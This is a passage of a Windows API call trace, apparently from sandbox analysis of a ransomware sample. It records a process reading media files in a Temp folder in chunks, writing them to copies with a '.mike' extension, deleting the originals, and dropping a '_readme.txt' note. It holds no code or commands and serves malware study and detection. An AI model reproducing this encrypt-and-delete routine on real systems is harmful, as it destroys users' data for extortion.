ftLastAccessTime.dwLowDateTime=0x24267190, ftLastAccessTime.dwHighDateTime=0x1d4caa9, ftLastWriteTime.dwLowDateTime=0x24267190, ftLastWriteTime.dwHighDateTime=0x1d4caa9, nFileSizeHigh=0x0, nFileSizeLow=0xc68f)) returned 1 [0147.314] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0147.314] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P-ori- rChlL7Nv.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P-ori- rChlL7Nv.avi", lpFilePart=0x0) returned 0x44 [0147.314] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0147.314] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P-ori- rChlL7Nv.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\p-ori- rchll7nv.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.315] GetFileType (hFile=0x1d4) returned 0x1 [0147.315] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0147.315] GetFileType (hFile=0x1d4) returned 0x1 [0147.315] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0147.315] ReadFile (in: hFile=0x1d4, lpBuffer=0x22251bc, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x22251bc*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0147.317] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P-ori- rChlL7Nv.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P-ori- rChlL7Nv.avi.mike", lpFilePart=0x0) returned 0x49 [0147.317] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0147.317] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P-ori- rChlL7Nv.avi.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\p-ori- rchll7nv.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.318] GetFileType (hFile=0x1d4) returned 0x1 [0147.318] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0147.318] GetFileType (hFile=0x1d4) returned 0x1 [0147.318] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x220 [0147.319] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P-ori- rChlL7Nv.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P-ori- rChlL7Nv.avi", lpFilePart=0x0) returned 0x44 [0147.319] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0147.320] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P-ori- rChlL7Nv.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\p-ori- rchll7nv.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.320] GetFileType (hFile=0x1d4) returned 0x1 [0147.320] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0147.320] GetFileType (hFile=0x1d4) returned 0x1 [0147.320] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=10240, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2800 [0147.321] ReadFile (in: hFile=0x1d4, lpBuffer=0x2232194, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2232194*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0147.322] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P-ori- rChlL7Nv.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P-ori- rChlL7Nv.avi.mike", lpFilePart=0x0) returned 0x49 [0147.322] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0147.322] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P-ori- rChlL7Nv.avi.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\p-ori- rchll7nv.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.322] GetFileType (hFile=0x1d4) returned 0x1 [0147.322] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0147.323] GetFileType (hFile=0x1d4) returned 0x1 [0147.323] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2a20 [0147.323] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P-ori- rChlL7Nv.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P-ori- rChlL7Nv.avi", lpFilePart=0x0) returned 0x44 [0147.324] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0147.324] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P-ori- rChlL7Nv.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\p-ori- rchll7nv.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.324] GetFileType (hFile=0x1d4) returned 0x1 [0147.324] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0147.324] GetFileType (hFile=0x1d4) returned 0x1 [0147.325] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=20480, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x5000 [0147.325] ReadFile (in: hFile=0x1d4, lpBuffer=0x223f16c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x223f16c*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0147.326] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P-ori- rChlL7Nv.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P-ori- rChlL7Nv.avi.mike", lpFilePart=0x0) returned 0x49 [0147.326] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0147.326] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P-ori- rChlL7Nv.avi.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\p-ori- rchll7nv.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.327] GetFileType (hFile=0x1d4) returned 0x1 [0147.327] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0147.327] GetFileType (hFile=0x1d4) returned 0x1 [0147.327] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x5220 [0147.328] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P-ori- rChlL7Nv.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P-ori- rChlL7Nv.avi", lpFilePart=0x0) returned 0x44 [0147.328] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0147.328] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P-ori- rChlL7Nv.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\p-ori- rchll7nv.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.328] GetFileType (hFile=0x1d4) returned 0x1 [0147.328] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0147.329] GetFileType (hFile=0x1d4) returned 0x1 [0147.329] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=30720, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x7800 [0147.329] ReadFile (in: hFile=0x1d4, lpBuffer=0x224c144, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x224c144*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0147.330] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P-ori- rChlL7Nv.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P-ori- rChlL7Nv.avi.mike", lpFilePart=0x0) returned 0x49 [0147.330] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0147.331] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P-ori- rChlL7Nv.avi.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\p-ori- rchll7nv.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.331] GetFileType (hFile=0x1d4) returned 0x1 [0147.331] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0147.331] GetFileType (hFile=0x1d4) returned 0x1 [0147.331] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x7a20 [0147.332] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P-ori- rChlL7Nv.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P-ori- rChlL7Nv.avi", lpFilePart=0x0) returned 0x44 [0147.332] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0147.333] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P-ori- rChlL7Nv.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\p-ori- rchll7nv.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.333] GetFileType (hFile=0x1d4) returned 0x1 [0147.333] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0147.333] GetFileType (hFile=0x1d4) returned 0x1 [0147.333] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=40960, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0xa000 [0147.334] ReadFile (in: hFile=0x1d4, lpBuffer=0x225911c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x225911c*, lpNumberOfBytesRead=0x2af080*=0x268f, lpOverlapped=0x0) returned 1 [0147.335] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P-ori- rChlL7Nv.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P-ori- rChlL7Nv.avi.mike", lpFilePart=0x0) returned 0x49 [0147.335] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0147.335] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P-ori- rChlL7Nv.avi.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\p-ori- rchll7nv.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.336] GetFileType (hFile=0x1d4) returned 0x1 [0147.336] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0147.336] GetFileType (hFile=0x1d4) returned 0x1 [0147.336] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0xa220 [0147.336] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P-ori- rChlL7Nv.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P-ori- rChlL7Nv.avi.mike", lpFilePart=0x0) returned 0x49 [0147.337] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0147.337] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P-ori- rChlL7Nv.avi.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\p-ori- rchll7nv.avi.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.337] GetFileType (hFile=0x1d4) returned 0x1 [0147.337] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0147.338] GetFileType (hFile=0x1d4) returned 0x1 [0147.339] WriteFile (in: hFile=0x1d4, lpBuffer=0x226c940*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x226c940*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0147.339] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P-ori- rChlL7Nv.avi", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P-ori- rChlL7Nv.avi", lpFilePart=0x0) returned 0x44 [0147.340] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P-ori- rChlL7Nv.avi.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P-ori- rChlL7Nv.avi.mike", lpFilePart=0x0) returned 0x49 [0147.340] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0147.340] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P-ori- rChlL7Nv.avi.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\p-ori- rchll7nv.avi.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x21156ea0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x21156ea0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x211a3160, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0xc8b0)) returned 1 [0147.340] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0147.341] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P-ori- rChlL7Nv.avi", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P-ori- rChlL7Nv.avi", lpFilePart=0x0) returned 0x44 [0147.341] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P-ori- rChlL7Nv.avi.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P-ori- rChlL7Nv.avi.mike", lpFilePart=0x0) returned 0x49 [0147.341] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0147.341] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P-ori- rChlL7Nv.avi.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\p-ori- rchll7nv.avi.mike"), fInfoLevelId=0x0, lpFileInformation=0x226e04c | out: lpFileInformation=0x226e04c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x21156ea0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x21156ea0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x211a3160, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0xc8b0)) returned 1 [0147.342] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0147.342] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P-ori- rChlL7Nv.avi", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P-ori- rChlL7Nv.avi", lpFilePart=0x0) returned 0x44 [0147.342] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P-ori- rChlL7Nv.avi", dwFileAttributes=0x80) returned 1 [0147.343] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P-ori- rChlL7Nv.avi", nBufferLength=0x105, lpBuffer=0x2aec98, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P-ori- rChlL7Nv.avi", lpFilePart=0x0) returned 0x44 [0147.343] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P-ori- rChlL7Nv.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\p-ori- rchll7nv.avi")) returned 1 [0147.344] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P-ori- rChlL7Nv.avi", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P-ori- rChlL7Nv.avi", lpFilePart=0x0) returned 0x44 [0147.345] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0147.345] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P-ori- rChlL7Nv.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\p-ori- rchll7nv.avi"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0147.345] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0147.345] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P-ori- rChlL7Nv.avi", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\P-ori- rChlL7Nv.avi", lpFilePart=0x0) returned 0x44 [0147.346] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\_readme.txt", lpFilePart=0x0) returned 0x3c [0147.346] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af020) returned 1 [0147.346] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\_readme.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1d4 [0147.347] GetFileType (hFile=0x1d4) returned 0x1 [0147.347] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af01c) returned 1 [0147.348] GetFileType (hFile=0x1d4) returned 0x1 [0147.348] WriteFile (in: hFile=0x1d4, lpBuffer=0x226fcc0*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af0b8, lpOverlapped=0x0 | out: lpBuffer=0x226fcc0*, lpNumberOfBytesWritten=0x2af0b8*=0x45e, lpOverlapped=0x0) returned 1 [0147.349] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Pl66.mkv", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Pl66.mkv", lpFilePart=0x0) returned 0x39 [0147.349] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\RNWCEa_Rm_b.gif", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\RNWCEa_Rm_b.gif", lpFilePart=0x0) returned 0x40 [0147.350] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rpHRY1G5j_Sal_qK.mkv", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rpHRY1G5j_Sal_qK.mkv", lpFilePart=0x0) returned 0x45 [0147.350] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv", lpFilePart=0x0) returned 0x43 [0147.350] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv", lpFilePart=0x0) returned 0x43 [0147.351] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv", nBufferLength=0x105, lpBuffer=0x2aebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv", lpFilePart=0x0) returned 0x43 [0147.351] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0147.351] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\rrtdcstxrs9cpq.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.351] GetFileType (hFile=0x1d4) returned 0x1 [0147.352] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d0) returned 1 [0147.352] GetFileType (hFile=0x1d4) returned 0x1 [0147.352] CloseHandle (hObject=0x1d4) returned 1 [0147.352] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv", lpFilePart=0x0) returned 0x43 [0147.352] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\rRTdcSTxrS9Cpq.flv", lpFilePart=0x0) returned 0x43 [0147.353] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec14, lpFilePart=0x0 | out: lpBuffer="C:\\", 